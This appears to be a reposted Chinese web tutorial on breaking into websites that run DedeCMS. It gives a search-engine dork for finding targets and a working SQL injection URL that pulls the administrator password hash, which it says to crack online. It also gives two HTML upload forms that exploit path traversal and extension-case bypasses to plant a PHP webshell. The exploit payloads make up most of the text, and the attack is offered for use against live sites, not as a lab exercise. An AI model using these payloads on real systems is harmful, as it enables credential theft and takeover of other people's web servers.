dede入侵步驟


--------------------------------------------------------
情簡單整理下入侵測試的步驟:
漏洞利用實例
百度搜索關鍵字"Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc",獲得使用DeDeCMS系統的網站。
注入漏洞。首先訪問"/data/admin/ver.txt"頁面獲取系統最后升級時間,XXXXX說明已經修補2011年8月12日補丁,

然后訪問"/member/ajax_membergroup.php?action=post&membergroup=1"頁面,XXXXXX2說明存在該漏洞。
於是訪問頁面鏈接"/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`",
去掉前三位和最后一位,得到管理員的16位MD5碼,www.cmd5.com在線破解成功。


上傳漏洞。

要求網站開啟新會員注冊功能,首先注冊新會員,無需通過郵件驗證,只要登陸會員中心,然后訪問頁面鏈接
"/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post",
說明通過"/plus/carbuyaction.php"已經成功調用了上傳頁面"/dialog/select_soft_post"

於是將Php一句話木馬擴展名改為"rar"等,利用提交頁面upload1.htm,

將下面的源碼另存為upload1.htm,獲得提交頁面如圖下。
<form action="[url=http://127.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post]
http://127.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post[/url]" method="post"
enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>
1,必須登陸用戶。
2,將待上傳PHP文件擴展名改為"zip|gz|rar|iso|doc|xsl|ppt|wps"其中之一。
3,newname為上傳后的新文件名,擴展名使用大寫繞過,如"Php"


提交后盡管頁面出錯,但是myfile.Php文件已經成功上傳到網站根目錄。


upload2.htm
<form name="form1" action="http://127.1/member/uploads_add.php" method="post" enctype="multipart/form-data" >
<input type="hidden" name="mediatype" value="4" />
<input type="hidden" name="_GET[cfg_mb_addontype]" value="P hp|Php|php" />
<input type="hidden" name="dopost" value="save" />
<input name="addonfile" type="file" id="addonfile" />
<button class="button2" type="submit" >提交</button>
</form>

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM